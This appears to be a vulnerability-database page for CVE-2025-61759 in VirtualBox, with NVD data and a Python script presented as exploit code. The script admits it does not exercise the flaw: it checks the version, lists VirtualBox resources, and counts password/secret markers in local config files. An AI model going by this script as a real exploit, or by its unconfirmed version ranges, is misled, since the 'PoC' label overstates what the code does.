Security Vulnerability Report
CVE-2025-61759 CVSS 6.5 MEDIUM

CVE-2025-61759

Published: 2025-10-21 20:20:52
Last Modified: 2025-10-23 16:03:36

Description

Vulnerability in the Oracle VM VirtualBox product of Oracle Virtualization (component: Core). Supported versions that are affected are 7.1.12 and 7.2.2. Easily exploitable vulnerability allows low privileged attacker with logon to the infrastructure where Oracle VM VirtualBox executes to compromise Oracle VM VirtualBox. While the vulnerability is in Oracle VM VirtualBox, attacks may significantly impact additional products (scope change). Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all Oracle VM VirtualBox accessible data. CVSS 3.1 Base Score 6.5 (Confidentiality impacts). CVSS Vector: (CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N).

CVSS Details

CVSS Score
6.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:oracle:vm_virtualbox:7.1.12:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:oracle:vm_virtualbox:7.2.2:*:*:*:*:*:*:* - VULNERABLE
Oracle VM VirtualBox 7.1.12
Oracle VM VirtualBox 7.2.2

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
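# CVE-2025-61759 Oracle VM VirtualBox Core Component Information Disclosure PoC
# Note: This is a conceptual PoC based on the vulnerability description.
# The actual exploitation requires local access to a system running affected
# VirtualBox versions.
#
# What this script actually does: it runs a few read-only VBoxManage queries
# and inspects user-readable VirtualBox configuration files. It does not
# exercise the flaw itself (the advisory publishes no technical details of
# it), so its output is an inventory plus a version match, not a proof of
# exploitability.
import subprocess
import os
import ctypes   # not used by this script; kept so the module's import surface is unchanged
import struct   # not used by this script; kept so the module's import surface is unchanged

# Highest affected patch level per (major, minor) branch.
# NOTE(review): the advisory names only 7.1.12 and 7.2.2 as affected
# *supported* versions. Like the original check, earlier patch levels of the
# 7.1 and 7.2 branches are treated as affected as well -- confirm against the
# vendor advisory before relying on a "not vulnerable" verdict.
_AFFECTED_MAX_PATCH = {(7, 1): 12, (7, 2): 2}

# Seconds to wait for any single VBoxManage invocation.
VBOXMANAGE_TIMEOUT = 10

# Case-insensitive markers that make a config line count as sensitive.
_SENSITIVE_MARKERS = ('password', 'secret')


def _run_vboxmanage(*args, timeout=VBOXMANAGE_TIMEOUT):
    """Run ``VBoxManage <args>`` and return its stdout, or ``None`` on failure.

    Failure means the binary is missing or not executable, the call timed
    out, or the command exited non-zero. Only OS and subprocess errors are
    caught; anything else is a bug in this script and propagates.
    """
    command = ' '.join(args)
    try:
        result = subprocess.run(
            ['VBoxManage', *args],
            capture_output=True,
            text=True,
            timeout=timeout,
        )
    except (OSError, subprocess.SubprocessError) as e:
        print(f"[-] Error running VBoxManage {command}: {e}")
        return None
    if result.returncode != 0:
        # Output of a failed command is not data; do not report it as such.
        print(f"[-] VBoxManage {command} exited with status {result.returncode}")
        return None
    return result.stdout


def _parse_version(version):
    """Parse a VBoxManage version string into ``(major, minor, patch)``.

    Handles the forms VBoxManage prints, e.g. ``7.1.12r169651`` or
    ``7.1.12_Ubuntu``; the revision / distro suffix on the patch component
    is dropped. Returns ``None`` when the string does not start with two
    numeric dot-separated components.
    """
    parts = version.strip().split('.')
    if len(parts) < 2:
        return None
    try:
        major = int(parts[0])
        minor = int(parts[1])
        # "12r169651" -> "12", "12_Ubuntu" -> "12"; a missing patch reads as 0.
        patch = int(parts[2].split('_')[0].split('r')[0]) if len(parts) > 2 else 0
    except ValueError:
        return None
    return major, minor, patch


def _is_affected_version(major, minor, patch):
    """Return True when the version lies in an affected branch at or below its listed patch."""
    limit = _AFFECTED_MAX_PATCH.get((major, minor))
    return limit is not None and patch <= limit


def check_virtualbox_version(version=None):
    """Check if the installed VirtualBox version is vulnerable.

    Args:
        version: Optional version string to evaluate instead of querying
            ``VBoxManage --version`` (useful for testing). With the default
            ``None`` the installed version is queried, as before.

    Returns:
        True when the version is in an affected range; False otherwise,
        including when VBoxManage cannot be run or its output cannot be parsed.
    """
    if version is None:
        output = _run_vboxmanage('--version')
        if output is None:
            return False
        version = output.strip()
    print(f"[*] Detected VirtualBox version: {version}")
    parsed = _parse_version(version)
    if parsed is None:
        print(f"[-] Could not parse version string: {version!r}")
        return False
    if _is_affected_version(*parsed):
        print("[!] VULNERABLE version detected!")
        return True
    return False


def enumerate_shared_resources():
    """Enumerate VirtualBox shared resources accessible to low-privileged user.

    Each query is independent: a failure in one no longer skips the rest.
    """
    print("[*] Enumerating VirtualBox shared resources...")
    queries = (
        ("Shared folders", ('list', 'sharedfolders')),
        ("Running VMs", ('list', 'runningvms')),
        ("Host-only interfaces", ('list', 'hostonlyifs')),
    )
    for label, args in queries:
        output = _run_vboxmanage(*args)
        if output is not None:
            print(f"[*] {label}:\n{output}")


def _count_sensitive_lines(content):
    """Return the number of lines in *content* containing a sensitive marker."""
    return sum(
        1
        for line in content.splitlines()
        if any(marker in line.lower() for marker in _SENSITIVE_MARKERS)
    )


def attempt_core_component_access():
    """Attempt to access Core component resources beyond privilege level.

    Reads the VirtualBox configuration files a normal user can reach and
    reports *whether* they contain password/secret markers. The matching
    lines themselves are deliberately not echoed: writing credential
    material to the terminal (and to whatever captures it) is itself a
    disclosure, and the hit count is enough to substantiate the finding.
    """
    print("[*] Attempting to access Core component resources...")
    # Attempt to read VirtualBox configuration files
    config_paths = [
        os.path.expanduser('~/.config/VirtualBox/VirtualBox.xml'),
        '/etc/vbox/vbox.cfg',
        os.path.expanduser('~/.VirtualBox/VirtualBox.xml'),
    ]
    for path in config_paths:
        if not os.path.exists(path):
            continue
        try:
            # errors='replace': a stray non-UTF-8 byte must not abort the scan.
            with open(path, 'r', encoding='utf-8', errors='replace') as f:
                content = f.read()
        except PermissionError:
            print(f"[-] Permission denied: {path}")
            continue
        except OSError as e:
            print(f"[-] Could not read {path}: {e}")
            continue
        hits = _count_sensitive_lines(content)
        if hits:
            print(f"[!] Sensitive data found in {path} "
                  f"({hits} matching line(s); contents not shown)")

    # Attempt to access VirtualBox IPC/RPC interfaces
    output = _run_vboxmanage('list', 'systemproperties')
    if output is not None:
        print(f"[*] System properties accessible (potential info leak):\n{output[:500]}")


def main():
    """Print the banner, check the installed version and, if affected, run the inventory steps."""
    print("=" * 60)
    print("CVE-2025-61759 - Oracle VM VirtualBox Core Info Disclosure")
    print("CVSS 3.1: 6.5 (MEDIUM)")
    print("Affected: VirtualBox 7.1.12, 7.2.2")
    print("=" * 60)
    if check_virtualbox_version():
        enumerate_shared_resources()
        attempt_core_component_access()
        print("\n[!] System appears vulnerable to CVE-2025-61759")
        print("[!] Recommend upgrading to the latest patched version")
    else:
        print("\n[*] System does not appear to be vulnerable")


if __name__ == '__main__':
    main()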

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-61759", "sourceIdentifier": "[email protected]", "published": "2025-10-21T20:20:52.373", "lastModified": "2025-10-23T16:03:36.487", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Vulnerability in the Oracle VM VirtualBox product of Oracle Virtualization (component: Core). Supported versions that are affected are 7.1.12 and 7.2.2. Easily exploitable vulnerability allows low privileged attacker with logon to the infrastructure where Oracle VM VirtualBox executes to compromise Oracle VM VirtualBox. While the vulnerability is in Oracle VM VirtualBox, attacks may significantly impact additional products (scope change). Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all Oracle VM VirtualBox accessible data. CVSS 3.1 Base Score 6.5 (Confidentiality impacts). CVSS Vector: (CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N)."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.0, "impactScore": 4.0}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-269"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:oracle:vm_virtualbox:7.1.12:*:*:*:*:*:*:*", "matchCriteriaId": "D0846C94-6984-4E7F-9670-E5238AA8CA5F"}, {"vulnerable": true, "criteria": "cpe:2.3:a:oracle:vm_virtualbox:7.2.2:*:*:*:*:*:*:*", "matchCriteriaId": "613B5554-B57C-4AF9-AC10-E96278C44FC4"}]}]}], "references": [{"url": 
"https://www.oracle.com/security-alerts/cpuoct2025.html", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}